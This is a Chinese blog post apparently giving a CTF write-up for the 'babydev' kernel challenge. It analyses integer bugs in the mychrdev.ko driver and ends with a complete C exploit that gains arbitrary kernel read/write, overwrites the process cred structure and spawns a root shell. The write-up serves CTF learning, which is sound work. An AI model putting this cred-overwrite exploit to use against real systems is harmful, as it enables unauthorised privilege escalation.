<!DOCTYPE html>
<html lang="zh">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s">
     <link rel="shortcut icon" href="/img/favicon.ico">
    <title>
        xkaneiki&#39;s blog
    </title>
    <meta name="description" content="嘿，这是xkaneiki的博客。欢迎访问！">
    <meta name="keywords" content="Code,CTFer,Blog">
    <link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">
    <link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">
    <link rel="stylesheet" href="/css/style.css">
</head>
<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            xyb_babydev
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="babydev详解"><a href="#babydev详解" class="headerlink" title="babydev详解"></a>babydev详解</h1><h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><p>首先打开文件系统查看初始化的脚本<code>init</code></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line"> </span><br><span class="line">mount -t proc none /proc</span><br><span class="line">mount -t sysfs none /sys</span><br><span class="line">mount -t devtmpfs devtmpfs /dev</span><br><span class="line">chown root:root flag</span><br><span class="line">chmod 400 flag</span><br><span class="line"><span class="built_in">exec</span> 0&lt;/dev/console</span><br><span class="line"><span class="built_in">exec</span> 1&gt;/dev/console</span><br><span class="line"><span class="built_in">exec</span> 2&gt;/dev/console</span><br><span class="line"></span><br><span class="line">insmod mychrdev.ko</span><br><span class="line">chmod 777 /dev/mychrdev</span><br><span class="line"><span class="built_in">echo</span> -e <span class="string">"\nBoot took <span class="variable">$(cut -d' ' -f1 /proc/uptime)</span> seconds\n"</span></span><br><span class="line">setsid cttyhack setuidgid 1000 sh</span><br><span class="line"></span><br><span class="line">poweroff -d 0  -f</span><br></pre></td></tr></table></figure>
<p>发现程序加载了一个<code>mychrdev.ko</code>的模块，漏洞就应该在这个内核模块中。看名字应该是一个字符设备的驱动程序。</p>
<p>将这个模块从文件系统中拷贝出来，用IDA打开它，进行分析。可以看到程序主要有几个主要的函数<code>llseek</code>，<code>read</code>，<code>write</code>，<code>open</code>，<code>ioctl</code>。</p>
<p><img src="/2020/11/23/xyb-babydev/截屏2020-11-23 下午8.57.36.png" alt="截屏2020-11-23 下午8.57.36" style="zoom:50%;"></p>
<p>结合模块的名字大致能知道每个函数的作用，<code>read</code>，<code>write</code>，<code>open</code>就是重写了<code>orw</code>操作，<code>ioctl</code>大概是它自定义了一个操作，<code>llseek</code>实现的就是重定位读写指针的功能。</p>
<h3 id="ioctl"><a href="#ioctl" class="headerlink" title="ioctl"></a><code>ioctl</code></h3><p><img src="/2020/11/23/xyb-babydev/截屏2020-11-23 下午9.06.01.png" alt="截屏2020-11-23 下午9.06.01"></p>
<p>这个函数通过<code>0x1111</code>命令泄漏了一些信息给我们。通过它我们能知道<code>v9</code>,<code>v10</code>,<code>v11</code>,<code>v12</code>和<code>md</code>的值。通过分析我们知道<code>v9</code>是当前的进程号，<code>v10</code>是当前程序的名称，<code>v11</code>,<code>v12</code>缓冲区的一些信息，<code>md</code>则直接将缓冲区的地址<code>mydata</code>告诉了我们。</p>
<h3 id="read，write-amp-amp-llseek"><a href="#read，write-amp-amp-llseek" class="headerlink" title="read，write &amp;&amp; llseek"></a><code>read</code>，<code>write</code> &amp;&amp; <code>llseek</code></h3><p>驱动程序主要维护三个值，一个是文件的读写指针，没次打开文件的时候都会被重新设置为0；文件的头指针，指向文件内容开始的地方，它存放在<code>mydata+0x10000</code>中，表示文件内容的起始地址相对于<code>mydata</code>的偏移；三是文件的大小，它存放在<code>mydata+0x1008</code>中。</p>
<p>在<code>llseek</code>中可以重制文件指针的值，并且返回重制以后文件指针的值。它有三种模式</p>
<ul>
<li>当<code>mod==0</code>时，会重制文件指针为<code>a2</code></li>
<li>当<code>mod==1</code>时，将文件指针跳转到<code>当前地址+a2</code>的位置</li>
<li>当<code>mod==2</code>时，会将指针跳到文件倒数第<code>|a2|</code>（这里a2要是个负数）个位置</li>
</ul>
<p><strong>这里可以看到<code>llseek</code>无法将文件指针设置为一个负数。</strong></p>
<p><img src="/2020/11/23/xyb-babydev/截屏2020-11-23 下午9.05.34.png" alt="截屏2020-11-23 下午9.05.34"></p>
<p>查看<code>read</code>函数，在<code>copy_to_user</code>函数第二个参数<code>s_n + base + mydata</code>表示要拷贝的内核空间的地址，这里存在一个整型漏洞，<code>s_n+base</code>是负数的时候就可以跳转到<code>my_data</code>之前的地址。其中s_n是文件指针的值，我们无法通过<code>llseek</code>将其设置为负数，<strong>因此要想跳到<code>my_data</code>之前的位置进行操作要考虑在<code>base</code>上（<code>mydata+0x10000</code>）做文章</strong>。</p>
<p><img src="/2020/11/23/xyb-babydev/截屏2020-11-23 下午9.05.53.png" alt="截屏2020-11-23 下午9.05.53"></p>
<p>查看write函数，发现其同样存在整型漏洞，只要能将<code>my_data+0x10000</code>的位置，设置为负数就能够对mydata之前的地址进行操作。</p>
<p><img src="/2020/11/23/xyb-babydev/截屏2020-11-23 下午9.06.19.png" alt="截屏2020-11-23 下午9.06.19"></p>
<p>仔细观察发现write还有一个漏洞。<code>*(_QWORD *)(mydata + 0x10008) += n;</code>每次写成功之后都会吧写的内容的大小加到<code>mydata + 0x10008</code>上，和<code>llseek</code>配合就能够使得<code>mydata+0x10008</code>值超过<code>0x10000</code>，使得我们能够通过<code>write</code>随意修改<code>mydata+0x10000</code>和<code>mydata+0x10008</code>上的内容，从而实现对任意地址的读写操作。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>首先为了绕过<code>write</code>的检查，先写<code>0x10000</code>的内容，再将文件指针设置为<code>0</code>，再写<code>0x10000</code>的内容上去使得<code>my_data+0x10008</code>的值变成0x20000，这样就能随意写<code>my_data+0x10000</code>和<code>my_data+0x10008</code>的内容。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> fd = open(<span class="string">"/dev/mychrdev"</span>, O_WRONLY);</span><br><span class="line">    u_char buf[<span class="number">0x10010</span>];</span><br><span class="line">    <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span> buf);</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="number">2</span>; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">long</span> n = write(fd, buf, <span class="number">0x10000</span>);</span><br><span class="line">        lseek(fd, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    close(fd);</span><br></pre></td></tr></table></figure>
<p>然后我们就能够对任意地址进行读写，因为进程的<code>cred</code>结构在<code>mydata</code>之前，我们就主要跳到<code>mydata</code>之前进行操作。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">fd = open(<span class="string">"/dev/mychrdev"</span>, O_WRONLY);</span><br><span class="line"><span class="keyword">int</span> n = lseek(fd, pos, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">*(<span class="keyword">size_t</span> *)buf = -(<span class="keyword">long</span> <span class="keyword">long</span>)(addr &gt;&gt; <span class="number">8</span>);</span><br><span class="line">*(<span class="keyword">size_t</span> *)(buf + <span class="number">8</span>) = <span class="number">0x100000000000</span>LL;</span><br><span class="line">n = write(fd, buf, <span class="number">0x1000</span>);</span><br><span class="line"><span class="comment">// printf("%x\n\n", n);</span></span><br><span class="line">close(fd);</span><br><span class="line"></span><br><span class="line"><span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span> buf);</span><br><span class="line">fd = fd = open(<span class="string">"/dev/mychrdev"</span>, O_RDONLY);</span><br><span class="line">n = lseek(fd, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line"><span class="comment">// printf("%d\n", n);</span></span><br><span class="line">n = read(fd, buf, <span class="number">0x10000</span>);</span><br><span class="line"><span class="comment">// printf("%d\n\n", n);</span></span><br><span class="line">close(fd);</span><br></pre></td></tr></table></figure>
<p>利用<code>char target[16] = &quot;try2findmep4nda&quot;;prctl(PR_SET_NAME, target);</code>将<code>target</code>写进内核空间中，在内核空间中<code>targe</code>t的那个地址靠近<code>cred指针</code>，因此只要利用任意读爆破出它的地址就能够知道<code>cred</code>地址，利用任意写将<code>cred</code>中的前<code>0x28</code>个字节设置为0。这里可以参考<a href="http://p4nda.top/2018/11/07/stringipc/" target="_blank" rel="noopener">P4nda大神的博客</a>。    </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">print_hex(buf,<span class="number">0x100</span>);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"\n"</span>);</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i&lt;<span class="number">0x28</span>;i++)</span><br><span class="line">&#123;</span><br><span class="line">    buf[i]=<span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line">print_hex(buf, <span class="number">0x100</span>);</span><br></pre></td></tr></table></figure>
<p>最后实现提权。</p>
<p><img src="/2020/11/23/xyb-babydev/截屏2020-11-23 下午11.18.18.png" alt="截屏2020-11-23 下午11.18.18"></p>
<h2 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/prctl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">size_t</span> heap;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">id</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"uid:%d\n"</span>, getuid());</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">show</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> fd = open(<span class="string">"/dev/mychrdev"</span>, O_RDONLY);</span><br><span class="line">    u_char buf[<span class="number">0x100</span>];</span><br><span class="line"></span><br><span class="line">    ioctl(fd, <span class="number">0x1111</span>, buf);</span><br><span class="line">    u_char *p = buf;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"%d\n"</span>, *(<span class="keyword">int</span> *)p);</span><br><span class="line">    p += <span class="number">4</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"%s\n"</span>, p);</span><br><span class="line">    p += <span class="number">0x10</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"0x%x\n"</span>, *(<span class="keyword">int</span> *)p);</span><br><span class="line">    p += <span class="number">4</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"0x%x\n"</span>, *(<span class="keyword">long</span> *)p);</span><br><span class="line">    p += <span class="number">8</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"%p\n"</span>, *(<span class="keyword">size_t</span> *)p);</span><br><span class="line">    heap = *(<span class="keyword">size_t</span> *)p;</span><br><span class="line">    close(fd);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">print_hex</span><span class="params">(<span class="keyword">char</span> *buf, <span class="keyword">size_t</span> len)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; ((len / <span class="number">8</span>) * <span class="number">8</span>); i += <span class="number">8</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"0x%lx"</span>, *(<span class="keyword">size_t</span> *)(buf + i));</span><br><span class="line">        <span class="keyword">if</span> (i % <span class="number">16</span>)</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">" "</span>);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">"\n"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"\n"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"></span><br><span class="line">    id();</span><br><span class="line"></span><br><span class="line">    show();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">int</span> fd = open(<span class="string">"/dev/mychrdev"</span>, O_WRONLY);</span><br><span class="line">    u_char buf[<span class="number">0x10010</span>];</span><br><span class="line">    <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span> buf);</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="number">2</span>; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">long</span> n = write(fd, buf, <span class="number">0x10000</span>);</span><br><span class="line">        lseek(fd, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    close(fd);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">size_t</span> addr = <span class="number">0x10000</span>, pre_addr = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">size_t</span> cred, real_cred, target_addr;</span><br><span class="line">    <span class="keyword">char</span> target[<span class="number">16</span>] = <span class="string">"try2findmep4nda"</span>;</span><br><span class="line">    prctl(PR_SET_NAME, target);</span><br><span class="line">    <span class="keyword">for</span> (;; pre_addr = addr, addr += <span class="number">0x10000</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// printf("pre_addr:0x%lX\n",heap-pre_addr);</span></span><br><span class="line">        <span class="comment">// printf("addr:0x%lX\n", heap-addr);</span></span><br><span class="line">        <span class="keyword">size_t</span> pos = pre_addr + <span class="number">0x10001</span>;</span><br><span class="line">        <span class="comment">// printf("pos:0x%lx\n", pos);</span></span><br><span class="line"></span><br><span class="line">        fd = open(<span class="string">"/dev/mychrdev"</span>, O_WRONLY);</span><br><span class="line">        <span class="keyword">int</span> n = lseek(fd, pos, <span class="number">0</span>);</span><br><span class="line">        <span class="comment">// printf("0x%x\n", n);</span></span><br><span class="line">        <span class="comment">// *(size_t *)buf = -0x10000LL;</span></span><br><span class="line">        *(<span class="keyword">size_t</span> *)buf = -(<span class="keyword">long</span> <span class="keyword">long</span>)(addr &gt;&gt; <span class="number">8</span>);</span><br><span class="line">        *(<span class="keyword">size_t</span> *)(buf + <span class="number">8</span>) = <span class="number">0x100000000000</span>LL;</span><br><span class="line">        n = write(fd, buf, <span class="number">0x1000</span>);</span><br><span class="line">        <span class="comment">// printf("%x\n\n", n);</span></span><br><span class="line">        close(fd);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span> buf);</span><br><span class="line">        fd = fd = open(<span class="string">"/dev/mychrdev"</span>, O_RDONLY);</span><br><span class="line">        n = lseek(fd, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">        <span class="comment">// printf("%d\n", n);</span></span><br><span class="line">        n = read(fd, buf, <span class="number">0x10000</span>);</span><br><span class="line">        <span class="comment">// printf("%d\n\n", n);</span></span><br><span class="line">        close(fd);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (n != <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            u_int result = memmem(buf, <span class="number">0x10000</span>, target, <span class="number">16</span>);</span><br><span class="line">            <span class="keyword">if</span> (result)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">size_t</span> temp = buf + result - (u_int)buf;</span><br><span class="line">                real_cred = *(<span class="keyword">size_t</span> *)(temp - <span class="number">0x10</span>);</span><br><span class="line">                <span class="comment">// target_addr = heap - addr + result - (u_int)(buf);</span></span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    pre_addr=addr;</span><br><span class="line">    <span class="keyword">size_t</span> mod=(real_cred&gt;&gt;<span class="number">16</span>)&lt;&lt;<span class="number">16</span>;</span><br><span class="line">    addr=heap-mod;</span><br><span class="line">    <span class="keyword">size_t</span> p_pos=real_cred-mod;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// printf("%p\n", pre_addr);</span></span><br><span class="line">    <span class="comment">// printf("%p\n", addr);</span></span><br><span class="line">    <span class="comment">// printf("%p\n", mod);</span></span><br><span class="line">    <span class="comment">// printf("%p\n", p_pos);</span></span><br><span class="line"></span><br><span class="line">    fd = open(<span class="string">"/dev/mychrdev"</span>, O_WRONLY);</span><br><span class="line">    <span class="keyword">size_t</span> pos = pre_addr + <span class="number">0x10001</span>;</span><br><span class="line">    <span class="keyword">int</span> n = lseek(fd, pos, <span class="number">0</span>);</span><br><span class="line">    *(<span class="keyword">size_t</span> *)buf = -(<span class="keyword">long</span> <span class="keyword">long</span>)(addr &gt;&gt; <span class="number">8</span>);</span><br><span class="line">    *(<span class="keyword">size_t</span> *)(buf + <span class="number">8</span>) = <span class="number">0x100000000000</span>LL;</span><br><span class="line">    n = write(fd, buf, <span class="number">0x1000</span>);</span><br><span class="line">    <span class="comment">// printf("%x\n\n", n);</span></span><br><span class="line">    close(fd);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span> buf);</span><br><span class="line">    fd = fd = open(<span class="string">"/dev/mychrdev"</span>, O_RDONLY);</span><br><span class="line">    n = lseek(fd, p_pos, <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// printf("%d\n", n);</span></span><br><span class="line">    n = read(fd, buf, <span class="number">0x100</span>);</span><br><span class="line">    <span class="comment">// printf("%d\n\n", n);</span></span><br><span class="line">    close(fd);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// print_hex(buf,0x100);</span></span><br><span class="line">    <span class="comment">// printf("\n");</span></span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i&lt;<span class="number">0x28</span>;i++)</span><br><span class="line">    &#123;</span><br><span class="line">        buf[i]=<span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// print_hex(buf, 0x100);</span></span><br><span class="line"></span><br><span class="line">    fd = fd = open(<span class="string">"/dev/mychrdev"</span>, O_WRONLY);</span><br><span class="line">    n = lseek(fd, p_pos, <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// printf("%d\n", n);</span></span><br><span class="line">    n = write(fd, buf, <span class="number">0x100</span>);</span><br><span class="line">    <span class="comment">// printf("%d\n\n", n);</span></span><br><span class="line">    close(fd);</span><br><span class="line"></span><br><span class="line">    id();</span><br><span class="line">    <span class="comment">// close(fd);</span></span><br><span class="line"></span><br><span class="line">    system(<span class="string">"/bin/sh"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这篇博客已经在发布在安全客上<a href="https://www.anquanke.com/post/id/223468" target="_blank" rel="noopener">https://www.anquanke.com/post/id/223468</a></p>

    </div>

    
</div>
    <div class="footer" id="footer">
    <p></p><h4>Copyright © 2020 | Author: xkaneiki | Theme By <a class="theme-author" href="https://github.com/Xunzhuo/hexo-theme-coder" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
<p></p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="NOsswOncKgc8HOxqo9oxIWlX-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="z1FihjWEbS8uIfUQdmCtK7zz">
<script src="/libs/jquery.min.js"></script>
<script src="/libs/highlight/highlight.pack.js"></script>
<script src="//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js"></script>
<script src="/js/js.js"></script>
<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
